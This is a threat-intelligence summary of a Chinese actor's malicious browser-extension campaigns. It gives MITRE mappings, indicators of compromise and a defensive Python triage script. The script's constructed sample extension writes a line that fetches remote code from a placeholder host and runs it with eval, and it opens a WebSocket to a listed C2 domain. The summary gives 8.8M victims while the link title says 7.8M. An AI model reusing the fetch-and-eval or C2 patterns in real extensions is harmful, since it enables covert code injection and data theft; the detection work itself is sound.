A single, well-resourced Chinese threat actor called DarkSpectre operated at least three large extension-based campaigns—ShadyPanda, GhostPoster, and the newly disclosed Zoom Stealer—infecting over 8.8 million users across Chrome, Edge, Firefox, and Opera using varied techniques including steganography, remote code injection, and real-time WebSocket exfiltration. The Zoom Stealer campaign alone harvested corporate meeting intelligence from 2.2M users by scraping 28+ conferencing platforms and streaming data to attacker-controlled Firebase and cloud function infrastructure. #DarkSpectre #ZoomStealer
Key points
- Researchers linked over 100 browser extensions and shared infrastructure to a single actor named DarkSpectre responsible for three major campaigns (ShadyPanda, GhostPoster, Zoom Stealer) spanning 7+ years and 8.8M+ victims.
- ShadyPanda (5.6M users) uses long-lived legitimate extensions as sleepers, remote JSON configuration C2, and time-delayed weaponization to perform mass surveillance and affiliate fraud across Chrome, Edge, and Firefox.
- GhostPoster (1.05M users) delivers stealthy payloads by hiding JavaScript inside PNG icons (steganography), loading it in multiple stages, and activating only with low probability to evade detection, targeting Firefox and Opera users.
- The newly disclosed Zoom Stealer (2.2M users) harvests meeting links, passwords, participant lists, and speaker dossiers from 28+ conferencing platforms and streams data in real time via WebSockets to Firebase/cloud functions.
- Investigators tied clusters via “clean” shared domains (e.g., infinitynewtab.com) used for legitimate extension features, which revealed hardcoded C2 domains and redirect chains linking all campaigns.
- Attribution points to a China-based, well-funded operation: Alibaba Cloud hosting, ICP registrations in Chinese provinces, Chinese language artifacts in code, and targeting tuned to Chinese e-commerce affiliate schemes.
MITRE Techniques
- [T1071.001] Application Layer Protocol – Real-time WebSocket connections were used to stream meeting activity directly to attacker servers (‘…persistent WebSocket connection that streams your meeting activity in real-time…’)
- [T1041] Exfiltration Over C2 Channel – Collected meeting and surveillance data was sent to attacker-controlled infrastructure such as Firebase and cloud functions for storage and processing (‘…collected data in a Firebase Realtime Database (zoocorder.firebaseio.com) and tracked every page visit through a Google Cloud Function.’)
- [T1059.007] JavaScript – Malicious JavaScript was executed in-browser via decoded payloads and dynamic eval() calls to perform remote code injection and runtime behavior changes (‘extracts hidden JavaScript, executes it.’ / ‘Downloads and executes JavaScript from bcaicai.com on every website visited.’)
- [T1027.003] Steganography (sub-technique of Obfuscated Files/Information) – Payloads were concealed inside PNG icon files and later decoded to execute hidden JavaScript (‘Malicious code hidden inside PNG icon files using steganography. The extension loads its own logo, extracts hidden JavaScript, executes it.’)
- [T1036.005] Masquerading – Extensions presented as legitimate productivity or utility tools (new tabs, translators, video downloaders) to gain trust and marketplace approvals before weaponizing (‘extensions disguised as meeting productivity tools’ / ‘presented themselves as productivity tools – new tab pages, translators, tab managers’)
- [T1123] Audio Capture – Extensions included capabilities to capture audio (e.g., Chrome Audio Capture) and other meeting content as part of the data collection engine (‘One extension stands out: Chrome Audio Capture with 800,000+ installations alone.’)
Indicators of Compromise
- [Domains] C2, exfiltration, and infrastructure – webinarstvus[.]cloudfunctions[.]net, zoocorder.firebaseio[.]com, meetingtv[.]us, infinitynewtab[.]com, infinitytab[.]com, plus further domains (e.g., jt2x[.]com, gmzdaily[.]com, liveupdt[.]com) listed in the full report.
- [IP Address] Hosting – 58.144.143.27 (listed as associated hosting infrastructure).
- [Extension names] Malicious or abused marketplace items – Chrome Audio Capture, Twitter X Video Downloader, Google™ Translate (Opera addon by charliesmithbons).
- [Extension IDs / UUIDs] Marketplace identifiers tied to campaigns – example Firefox UUIDs {7536027f-96fb-4762-9e02-fdfaedd3bfb5}, {34b0d04c-29cf-473c-bb6c-c2fe94377b99} and numerous Chrome/Edge IDs listed in the report.
- [Email addresses / publisher contacts] Publisher or contact artifacts – nickyfeng2@edgetranslate[.]com, 1305302314@qq[.]com.
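The traits summarised in the key points and MITRE mappings above (JavaScript hidden behind a PNG icon, dynamic eval(), WebSocket channels, broad host permissions) and the domain indicators listed here can be turned into a first-pass static triage of an unpacked extension. The script below is an added example written for this summary, not code from Koi's report or from the campaigns it describes; the heuristics and thresholds, the sample extension it builds in a temporary directory, and the config.example URL in that sample are constructed for illustration, while the domain list is copied from the Indicators of Compromise section.

```python
"""Static triage of an unpacked browser extension; added example, heuristics give leads, not verdicts."""
import json
import os
import re
import struct
import tempfile
import zlib

# Defanged indicators copied from the IoC section; refanged before matching.
KNOWN_IOC_DOMAINS = ["webinarstvus[.]cloudfunctions[.]net", "zoocorder.firebaseio[.]com",
                     "meetingtv[.]us", "infinitynewtab[.]com", "infinitytab[.]com"]
PNG_SIG = b"\x89PNG\r\n\x1a\n"
ANCILLARY_CHUNK_LIMIT = 2048  # assumed threshold; icons rarely carry big tEXt/zTXt blobs
JS_PATTERNS = {  # heuristic markers, each also common in benign code
    "dynamic-eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "websocket": re.compile(r"\bnew\s+WebSocket\s*\(|\bwss?://"),
    "remote-fetch": re.compile(r"\bfetch\s*\(\s*['\"]https?://"),
}

def refang(indicator: str) -> str:
    """Turn 'a[.]b' back into 'a.b' so it can be matched against code."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

def png_findings(data: bytes) -> list[str]:
    """Walk PNG chunks; flag bytes after IEND and oversized ancillary chunks."""
    if not data.startswith(PNG_SIG):
        return ["not-a-png"]
    out, pos = [], len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if ctype[:1].islower() and length > ANCILLARY_CHUNK_LIMIT:  # lowercase = ancillary
            out.append(f"large-ancillary-chunk:{ctype.decode()}:{length}")
        pos += 8 + length + 4  # header + data + CRC
        if ctype == b"IEND":
            if pos < len(data):  # nothing legitimate follows IEND
                out.append(f"png-trailing-bytes:{len(data) - pos}")
            break
    return out

def js_findings(text: str, ioc_domains: list[str]) -> list[str]:
    """Pattern hits plus any refanged indicator domain present in the script."""
    out = [name for name, pat in JS_PATTERNS.items() if pat.search(text)]
    return out + [f"ioc-domain:{d}" for d in ioc_domains if d in text]

def manifest_findings(manifest: dict) -> list[str]:
    """Flag grants that let a long-lived 'sleeper' extension reach every site."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    if "<all_urls>" in perms or any(p.endswith("://*/*") for p in perms):
        return ["broad-host-permissions"]
    return []

def triage_extension(ext_dir: str) -> dict[str, list[str]]:
    """Return {relative path: findings} for every file that tripped a heuristic."""
    iocs = [refang(d) for d in KNOWN_IOC_DOMAINS]
    report = {}
    for root, _, files in os.walk(ext_dir):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                data = fh.read()
            found = []
            if name == "manifest.json":
                found = manifest_findings(json.loads(data))
            elif name.endswith(".js"):
                found = js_findings(data.decode("utf-8", "replace"), iocs)
            elif name.endswith(".png"):
                found = png_findings(data)
            if found:
                report[os.path.relpath(path, ext_dir)] = found
    return report

def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk (length, type, data, CRC); used to build the sample icon."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def minimal_png() -> bytes:
    """A valid 1x1 greyscale PNG built by hand (no image library needed)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")

def build_sample_extension(base_dir: str) -> str:
    """Write a fake extension showing the flagged traits (constructed, not real)."""
    ext = os.path.join(base_dir, "sample_ext")
    os.makedirs(ext, exist_ok=True)
    with open(os.path.join(ext, "manifest.json"), "w") as fh:
        json.dump({"manifest_version": 3, "name": "Sample Tab Helper", "version": "1.0",
                   "host_permissions": ["<all_urls>"],
                   "background": {"service_worker": "background.js"}}, fh)
    with open(os.path.join(ext, "background.js"), "w") as fh:
        fh.write("// constructed sample, not campaign code; config.example is a placeholder host\n"
                 "const ws = new WebSocket('wss://meetingtv.us/stream');\n"
                 "fetch('https://config.example/cfg.json').then(r => r.json())"
                 ".then(c => eval(c.code));\n")
    with open(os.path.join(ext, "icon.png"), "wb") as fh:
        fh.write(minimal_png() + b"// constructed trailing blob in place of a hidden payload\n")
    return ext

def run_demo() -> dict[str, list[str]]:
    """Build the sample in a temp dir and triage it; returns the findings map."""
    return triage_extension(build_sample_extension(tempfile.mkdtemp()))
```

Call run_demo() to see the findings for the constructed sample, or point triage_extension() at a real extension directory unpacked from a browser profile. Every hit is a lead for manual review rather than a verdict: plenty of benign extensions fetch remote resources or request wide host permissions, which is exactly why the report's "sleeper" extensions passed marketplace review for years.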
Read more: https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers